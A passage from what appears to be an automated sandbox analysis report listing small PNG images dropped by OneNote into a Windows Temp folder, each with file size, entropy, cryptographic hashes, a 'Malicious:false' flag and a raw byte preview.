                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{5E62863D-2B4D-4C02-BE0F-0901F086D74B}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{5E9A5B11-CD35-438E-8844-483E3E2633FA}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{610085F2-92B7-42F5-8078-0A51FF99620B}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{63243947-B641-4D9A-9957-F70E9E99734E}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{69C0E12D-7C41-4E0E-BB57-95051CB3AA2C}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{69C9F559-7D87-402D-98F6-DD413E59FF57}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{6B35A91A-7F7C-411A-9473-5C855AD1D227}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{6E4962A6-E319-4A93-9287-BC8B9745AB6B}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{712631D3-40CA-44FD-8345-5179B5F2B9B6}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{71312FA3-F6E9-4980-99E5-1C3C2EFC9302}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{75749190-DCA3-447F-BDA3-C56B3BED5491}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{776A8E26-58B3-4B97-9C9F-A47D97AA17A8}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
